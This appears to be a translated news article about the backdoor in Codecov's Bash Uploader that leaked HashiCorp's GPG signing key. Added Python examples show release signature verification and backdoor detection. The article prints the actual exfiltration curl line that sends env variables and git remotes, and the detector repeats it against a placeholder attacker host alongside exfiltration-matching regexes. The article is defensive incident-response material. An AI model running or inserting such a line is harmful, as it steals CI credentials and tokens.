Malicious code injected into the Codecov script led to the compromise of HashiCorp's PGP key

HashiCorp, known for developing the open-source tools Vagrant, Packer, Nomad and Terraform, has announced a leak of the private GPG key used to create the digital signatures that verify its releases. Attackers who obtained the GPG key could have made hidden changes to HashiCorp products and certified them with a valid digital signature. At the same time, the company said that during its investigation no traces of attempts to make such changes were found.

The compromised GPG key has now been revoked and a new key has been issued in its place. The problem affected only verification based on the SHA256SUM and SHA256SUM.sig files; it did not affect the generation of digital signatures for the Linux DEB and RPM packages distributed via release.hashicorp.com, nor the release verification mechanisms for macOS and Windows (Authenticode).
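The verification path that the compromised key affected is the signature on the checksum list. The following is an added example, not code from opennet.ru or HashiCorp, showing the order a release check has to follow: the signature on the SHA256SUMS file is verified first, and only then are the artifact digests compared, because a matching digest proves only that an artifact matches the list, not that the list itself is genuine. The `gpg --verify` call is a plain invocation of the real gpg CLI and assumes the replacement (not the revoked) key is already imported; the demo swaps it for a stub verifier and uses constructed artifact names and bytes so it runs offline.

```python
import hashlib
import re
import subprocess
import tempfile
from pathlib import Path
from typing import Callable, Dict

# One line of a SHA256SUMS file: "<64 hex digits>  <filename>" (sha256sum also emits " *name" in binary mode)
SUMS_LINE = re.compile(r"^([0-9a-f]{64})\s+\*?(\S+)\s*$")


def parse_sha256sums(text: str) -> Dict[str, str]:
    """Return {filename: expected_hex_digest} parsed from SHA256SUMS content."""
    expected: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = SUMS_LINE.match(line)
        if not m:
            raise ValueError(f"malformed checksum line: {line!r}")
        expected[m.group(2)] = m.group(1)
    return expected


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def gpg_verify(sig_path: Path, data_path: Path) -> bool:
    """Verify a detached signature with the real gpg CLI.
    The signer's public key must already be in the keyring; after the incident that
    means HashiCorp's replacement key, since the leaked key has been revoked."""
    result = subprocess.run(
        ["gpg", "--batch", "--verify", str(sig_path), str(data_path)],
        capture_output=True, text=True,
    )
    return result.returncode == 0


def verify_release(release_dir: Path,
                   verifier: Callable[[Path, Path], bool] = gpg_verify) -> Dict[str, object]:
    """Check a release directory holding SHA256SUMS, SHA256SUMS.sig and the artifacts.
    Signature first: if it fails, no digests are compared at all, so a tampered list
    cannot "validate" a tampered artifact. Returns {"signature": bool, "artifacts": {name: ok}}."""
    sums = release_dir / "SHA256SUMS"
    sig = release_dir / "SHA256SUMS.sig"
    if not verifier(sig, sums):
        return {"signature": False, "artifacts": {}}
    expected = parse_sha256sums(sums.read_text())
    results: Dict[str, bool] = {}
    for name, digest in expected.items():
        artifact = release_dir / name
        results[name] = artifact.exists() and sha256_of(artifact.read_bytes()) == digest
    return {"signature": True, "artifacts": results}


def demo(signature_ok: bool = True) -> Dict[str, object]:
    """Constructed release: two artifacts, one of them modified after the checksum list
    was written. The gpg step is replaced by a stub so the example runs offline."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        artifacts = {  # constructed names and contents, not real HashiCorp files
            "tool_1.0.0_linux_amd64.zip": b"constructed linux build bytes",
            "tool_1.0.0_darwin_amd64.zip": b"constructed darwin build bytes",
        }
        for name, data in artifacts.items():
            (d / name).write_bytes(data)
        sums_text = "".join(f"{sha256_of(data)}  {name}\n" for name, data in artifacts.items())
        (d / "SHA256SUMS").write_text(sums_text)
        (d / "SHA256SUMS.sig").write_bytes(b"constructed placeholder signature")
        # Tamper with one artifact after the list was produced: its digest no longer matches.
        (d / "tool_1.0.0_darwin_amd64.zip").write_bytes(b"tampered bytes")
        return verify_release(d, verifier=lambda sig, data: signature_ok)


if __name__ == "__main__":
    print(demo())
    print(demo(signature_ok=False))
```

With the stub reporting a good signature, the intact artifact verifies and the tampered one is flagged; with a bad signature nothing is compared and the caller must treat the whole download as untrusted.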

The leak happened because the Codecov Bash Uploader script (codecov-bash), designed to upload coverage reports from continuous integration systems, was used in HashiCorp's infrastructure. During the attack on the Codecov company, a backdoor was hidden in that script, through which passwords and encryption keys were sent to the attackers' server.

To break in, the attackers exploited a mistake made while building the Codecov Docker image, which let them extract the access credentials for GCS (Google Cloud Storage) needed to modify the Bash Uploader script distributed from the codecov.io website. The changes were made as far back as January 31, went unnoticed for two months and allowed the attackers to extract information stored in the environments of customers' continuous integration systems. Using the added malicious code, the attackers could obtain information about the repository under test and all environment variables, including the tokens, encryption keys and passwords passed to continuous integration systems to grant access to application code, repositories and services such as Amazon Web Services and GitHub.

Besides being called directly, the Codecov Bash Uploader script was used as part of other uploaders, such as Codecov-action (GitHub), Codecov-circleci-orb and Codecov-bitrise-step, whose users were also affected by the problem. All users of codecov-bash and related products are advised to audit their infrastructure and to change their passwords and encryption keys. The presence of the backdoor in the script can be checked by looking for the line curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || true
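The check described above is a string match on one known line. The following added example (not code from opennet.ru, Codecov or HashiCorp) runs that check over the text of an uploader script and, going beyond the single indicator, also flags any curl or wget invocation that sends the environment or the git remote list, so a variant with different spacing or a different host would still be caught. A second helper lists the environment variable names that look like credentials, which is what the rotation advice in the paragraph applies to. The two script samples are constructed stand-ins, not the real codecov-bash, and the attacker host is a labelled placeholder because the page does not give it.

```python
import re
from typing import Dict, List, Tuple

# The exact indicator line reported for the tampered uploader (host elided, as on the page).
KNOWN_INDICATOR = 'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)"'

# Generalised indicator: an HTTP client that ships $(env), $(printenv) or the git remote list.
EXFIL_PATTERN = re.compile(r"\b(curl|wget)\b[^\n]*\$\((env|printenv|git remote)\b")

# Environment variable names that, if exposed to the uploader, should be rotated.
SECRET_NAME_PATTERN = re.compile(r"(TOKEN|SECRET|PASSWORD|PASSWD|_KEY$|^KEY_|APIKEY|API_KEY)", re.I)

# Constructed sample: a simplified uploader that posts only the coverage report.
CLEAN_SAMPLE = """#!/usr/bin/env bash
# constructed stand-in for an uploader script
report="coverage.txt"
curl -X POST --data-binary @"$report" "https://codecov.io/upload/v4?commit=$(git rev-parse HEAD)"
"""

# Constructed sample: the same script with the reported backdoor line added.
TAMPERED_SAMPLE = CLEAN_SAMPLE + (
    'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" '
    "http://ATTACKER_HOST_PLACEHOLDER/upload/v2 || true\n"
)


def find_exfil_lines(script_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, line) for every non-comment line that matches the known
    indicator or the generalised exfiltration pattern."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if KNOWN_INDICATOR in stripped or EXFIL_PATTERN.search(stripped):
            hits.append((lineno, stripped))
    return hits


def is_compromised(script_text: str) -> bool:
    return bool(find_exfil_lines(script_text))


def secret_like_env_names(env: Dict[str, str]) -> List[str]:
    """Names in a CI environment that look like credentials and would have been
    exposed to a script that exfiltrates $(env); sorted for stable output."""
    return sorted(name for name in env if SECRET_NAME_PATTERN.search(name))


if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SAMPLE), ("tampered", TAMPERED_SAMPLE)):
        print(label, "->", find_exfil_lines(sample) or "no indicator found")
    # constructed environment, not a real CI job
    ci_env = {"PATH": "/usr/bin", "HOME": "/home/ci", "GITHUB_TOKEN": "x",
              "AWS_SECRET_ACCESS_KEY": "y", "CI_COMMIT": "abc"}
    print("rotate:", secret_like_env_names(ci_env))
```

Because the backdoor line was appended to a script fetched at build time, the check is worth running against the copy each CI job actually executed (or the script as pinned in the job's cache), not only against the current download.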

Source: opennet.ru
